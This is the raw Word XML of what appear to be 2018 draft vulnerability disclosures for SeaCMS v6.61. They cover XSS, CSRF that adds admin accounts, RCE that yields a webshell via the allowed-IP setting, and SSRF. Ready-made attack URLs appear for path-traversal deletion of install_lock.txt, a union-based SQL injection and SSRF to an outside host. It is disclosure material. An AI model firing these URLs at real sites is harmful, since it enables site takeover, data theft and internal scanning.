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9520" w14:textId="6DB5EA51" w:rsidR="008C5D64" w:rsidRDefault="008C5D64" w:rsidP="008C5D64">
      <w:r w:rsidRPr="008C5D64">
        <w:t xml:space="preserve">XSS exists in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t>seacms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t xml:space="preserve"> V6.61 site name and can be executed by setting up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t>paylod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t xml:space="preserve"> execution </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t>script.(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t>exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69FEA9" w14:textId="77777777" w:rsidR="008C5D64" w:rsidRDefault="008C5D64" w:rsidP="008C5D64"/>
    <w:p w14:paraId="614EA751" w14:textId="7991535E" w:rsidR="00395FC7" w:rsidRDefault="008C5D64" w:rsidP="008C5D64">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t>seacms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t xml:space="preserve"> V6.61 has XSS via the site name parameter on an adm1n/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t>admin_config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C5D64">
        <w:t xml:space="preserve"> page (aka a system management page).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57383422" w14:textId="2234E747" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D64"/>
    <w:p w14:paraId="629949FC" w14:textId="2DB8356B" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D64"/>
    <w:p w14:paraId="0EE620CB" w14:textId="2D84B3D6" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D64"/>
    <w:p w14:paraId="30718D23" w14:textId="77777777" w:rsidR="004A47D4" w:rsidRPr="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="004A47D4">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:right="2250"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004A47D4">
        <w:t>There is two CSRF vulnerability that can add the administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F3D309" w14:textId="0F404B90" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D64"/>
    <w:p w14:paraId="309F909B" w14:textId="747B541C" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D64"/>
    <w:p w14:paraId="3A56B327" w14:textId="2B23B81C" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D64"/>
    <w:p w14:paraId="145AD4F4" w14:textId="17B747B1" w:rsidR="004A47D4" w:rsidRDefault="004A47D4" w:rsidP="008C5D6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After the administrator logged in, open the following two page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/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poc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one.html---add a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D461C14" w14:textId="35B00FBF" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64"/>
    <w:p w14:paraId="3E58DC31" w14:textId="2921EF6A" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D6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two.html---add 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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA823D" w14:textId="609311A2" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64"/>
    <w:p w14:paraId="05186BE4" w14:textId="2640FCE9" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64">
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve">After the administrator logged in, open the following two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>page.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve"> administrator will add a user unknown.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms1.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26333151" w14:textId="14F7AC85" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64"/>
    <w:p w14:paraId="7CA237B7" w14:textId="36F143F9" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64">
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve">An issue was discovered in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>seacms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add a user account via adm1n/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>admin_manager.php?action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>=add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9759B" w14:textId="2BB1A675" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64"/>
    <w:p w14:paraId="594BA69A" w14:textId="14655093" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64">
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve">After the administrator logged in, open the following two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>page.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve"> administrator will add a user to admin group unknown.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms1.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0DCA4" w14:textId="20AD43C4" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64"/>
    <w:p w14:paraId="320D74EB" w14:textId="74C517ED" w:rsidR="00AB1D8C" w:rsidRDefault="00AB1D8C" w:rsidP="008C5D64">
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve">An issue was discovered in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>seacms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t xml:space="preserve"> 6.61. There is a CSRF vulnerability that can add an admin account via adm1n/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>admin_manager.php?action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>save&amp;id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1D8C">
        <w:t>=2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833D316" w14:textId="0735D3BA" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64"/>
    <w:p w14:paraId="37084D27" w14:textId="5484AF0D" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64"/>
    <w:p w14:paraId="013C766B" w14:textId="3D5DD1EF" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64">
      <w:r w:rsidRPr="000F197D">
        <w:t>Remote Code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534B987D" w14:textId="4203B026" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22897427" w14:textId="4B9D8281" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64">
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve">After the admin logged </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>in,visit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> http://127.0.0.1/seacms/adm1n/admin_ip.php to set the allowed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> as special </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>value,we</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> will get a webshell.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms2.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4761D" w14:textId="64541BE9" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64"/>
    <w:p w14:paraId="09BFB0B6" w14:textId="1A187C51" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>SeaCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> v6.61 allows Remote Code execution by placing PHP code in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> allowed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> address (aka </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>) to /admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>admin_ip.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> (aka /adm1n/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>admin_ip.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>). The code is executed by visiting adm1n/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>admin_ip.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> or data/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>ip.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>. This can also be exploited through CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865EB98" w14:textId="390BFA97" w:rsidR="000F197D" w:rsidRDefault="000F197D" w:rsidP="008C5D64"/>
    <w:p w14:paraId="1B993A90" w14:textId="6CA9169F" w:rsidR="000F197D" w:rsidRDefault="00D05830" w:rsidP="008C5D64">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B47DA4">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://github.com/MichaelWayneLIU/seacms/blob/master/seacms2.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41B44880" w14:textId="2DD5B2B8" w:rsidR="00D05830" w:rsidRDefault="00D05830" w:rsidP="008C5D64"/>
    <w:p w14:paraId="7A36187A" w14:textId="08560625" w:rsidR="00D05830" w:rsidRDefault="00D05830" w:rsidP="008C5D64"/>
    <w:p w14:paraId="67367CCD" w14:textId="305EA9A1" w:rsidR="00D05830" w:rsidRDefault="00D05830" w:rsidP="008C5D64"/>
    <w:p w14:paraId="61A821C7" w14:textId="36658C58" w:rsidR="00D05830" w:rsidRDefault="00D05830" w:rsidP="00D05830">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B47DA4">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://127.0.0.1/seacms/adm1n/admin_template.php?action=del&amp;filedir=../templets/default/html/../../../install/install_lock.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53535BD2" w14:textId="70C5CC08" w:rsidR="00D05830" w:rsidRDefault="00D05830" w:rsidP="00D05830"/>
    <w:p w14:paraId="6F31345B" w14:textId="4DB2852A" w:rsidR="00D05830" w:rsidRDefault="00D05830" w:rsidP="00D05830"/>
    <w:p w14:paraId="54AB6AB5" w14:textId="19B117F2" w:rsidR="00D05830" w:rsidRDefault="00707398" w:rsidP="00D05830">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00B47DA4">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://127.0.0.1/seacms/adm1n/admin_database.php?action=redat&amp;delfile=1&amp;redStruct=1&amp;bakfiles=/../../../install/install_lock.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="165A5ABB" w14:textId="39F06653" w:rsidR="00707398" w:rsidRDefault="00707398" w:rsidP="00D05830"/>
    <w:p w14:paraId="56924C9A" w14:textId="4591909A" w:rsidR="00707398" w:rsidRDefault="00707398" w:rsidP="00D05830"/>
    <w:p w14:paraId="7C6549EB" w14:textId="54D1C4BD" w:rsidR="00707398" w:rsidRDefault="00707398" w:rsidP="00D05830"/>
    <w:p w14:paraId="0E7576FB" w14:textId="6953F5FE" w:rsidR="00707398" w:rsidRDefault="00315ED0" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00B47DA4">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://127.0.0.1/seacms/adm1n/admin_topic_vod.php?tid=-1%20union%20select%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))),2,3,4,5,6,7,8,9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D1F68F1" w14:textId="55110809" w:rsidR="00315ED0" w:rsidRDefault="00315ED0" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096E174A" w14:textId="15CD2DD4" w:rsidR="00315ED0" w:rsidRDefault="00DA41AA" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00B47DA4">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://127.0.0.1/seacms/adm1n/admin_reslib.php?action=day&amp;rid=ataoju.com&amp;pg=31&amp;url=http://207.148.74.197:8888&amp;backurl=admin_reslib.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B0649A7" w14:textId="1298707B" w:rsidR="00DA41AA" w:rsidRDefault="00DA41AA" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A2D7FB" w14:textId="3AB9DB30" w:rsidR="008C6F92" w:rsidRDefault="008C6F92" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C29A47" w14:textId="36026EB0" w:rsidR="00CD3971" w:rsidRDefault="00CD3971" w:rsidP="009537DD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve">After the admin logged </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>in,visit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F197D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="009537DD" w:rsidRPr="00B47DA4">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://127.0.0.1/seacms/adm1n/admin_reslib.php?action=day&amp;rid=ataoju.com&amp;pg=31&amp;url=http://{server}:8888&amp;backurl=admin_reslib.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009537DD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009537DD" w:rsidRPr="009537DD">
        <w:t xml:space="preserve"> The system will initiate a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009537DD" w:rsidRPr="009537DD">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009537DD" w:rsidRPr="009537DD">
        <w:t xml:space="preserve"> request to </w:t>
      </w:r>
      <w:r w:rsidR="009537DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="009537DD" w:rsidRPr="009537DD">
        <w:t>{server}</w:t>
      </w:r>
      <w:r w:rsidRPr="000F197D">
        <w:t>.(exp:https://github.com/MichaelWayneLIU/seacms/blob/master/seacms</w:t>
      </w:r>
      <w:r w:rsidR="00F874A4">
        <w:t>3</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="000F197D">
        <w:t>.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AA1EC" w14:textId="1C7A2CB8" w:rsidR="00CD3971" w:rsidRDefault="00CD3971" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161244CC" w14:textId="77777777" w:rsidR="00CD3971" w:rsidRPr="00CD3971" w:rsidRDefault="00CD3971" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F997E3F" w14:textId="746B5115" w:rsidR="00DA41AA" w:rsidRPr="00DA41AA" w:rsidRDefault="00A25A71" w:rsidP="00FB54F5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A25A71">
        <w:t>Sea</w:t>
      </w:r>
      <w:r w:rsidR="004F6533">
        <w:t>cms</w:t>
      </w:r>
      <w:r w:rsidRPr="00A25A71">
        <w:t>'s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A25A71">
        <w:t xml:space="preserve"> adm1n/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A25A71">
        <w:t>admin_reslib.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A25A71">
        <w:t xml:space="preserve"> has an SSRF vulnerability. The attacker is allowed to initiate a request to the intranet host, obtain the banner information of the web application reachable server service, and collect the fingerprint identification of the intranet web application.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA41AA" w:rsidRPr="00DA4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D6394" w14:textId="77777777" w:rsidR="00F0608F" w:rsidRDefault="00F0608F" w:rsidP="00D05830">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="140412A5" w14:textId="77777777" w:rsidR="00F0608F" w:rsidRDefault="00F0608F" w:rsidP="00D0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A59E" w14:textId="77777777" w:rsidR="00F0608F" w:rsidRDefault="00F0608F" w:rsidP="00D05830">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2309C6BD" w14:textId="77777777" w:rsidR="00F0608F" w:rsidRDefault="00F0608F" w:rsidP="00D05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45"/>
    <w:rsid w:val="00045567"/>
    <w:rsid w:val="000F197D"/>
    <w:rsid w:val="00315ED0"/>
    <w:rsid w:val="00395FC7"/>
    <w:rsid w:val="00415DE1"/>
    <w:rsid w:val="004A47D4"/>
    <w:rsid w:val="004E0397"/>
    <w:rsid w:val="004F6533"/>
    <w:rsid w:val="00707398"/>
    <w:rsid w:val="00753A45"/>
    <w:rsid w:val="008C5D64"/>
    <w:rsid w:val="008C6F92"/>
    <w:rsid w:val="009537DD"/>
    <w:rsid w:val="009561D9"/>
    <w:rsid w:val="00A25A71"/>
    <w:rsid w:val="00AB1D8C"/>
    <w:rsid w:val="00C025B6"/>
    <w:rsid w:val="00CD1A94"/>
    <w:rsid w:val="00CD3971"/>
    <w:rsid w:val="00D05830"/>
    <w:rsid w:val="00DA41AA"/>
    <w:rsid w:val="00F0608F"/>
    <w:rsid w:val="00F874A4"/>
    <w:rsid w:val="00F950F2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49848"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FCA18275-F12B-4230-8F87-F835E2F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7D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4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7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4A47D4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D0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830"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D058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5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seacms/adm1n/admin_database.php?action=redat&amp;delfile=1&amp;redStruct=1&amp;bakfiles=/../../../install/install_lock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/seacms/adm1n/admin_template.php?action=del&amp;filedir=../templets/default/html/../../../install/install_lock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WayneLIU/seacms/blob/master/seacms2.md" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/seacms/adm1n/admin_reslib.php?action=day&amp;rid=ataoju.com&amp;pg=31&amp;url=http://%7bserver%7d:8888&amp;backurl=admin_reslib.php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27.0.0.1/seacms/adm1n/admin_reslib.php?action=day&amp;rid=ataoju.com&amp;pg=31&amp;url=http://207.148.74.197:8888&amp;backurl=admin_reslib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/seacms/adm1n/admin_topic_vod.php?tid=-1%20union%20select%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))),2,3,4,5,6,7,8,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msarehere</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>msarehere</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-14T13:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-09T13:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>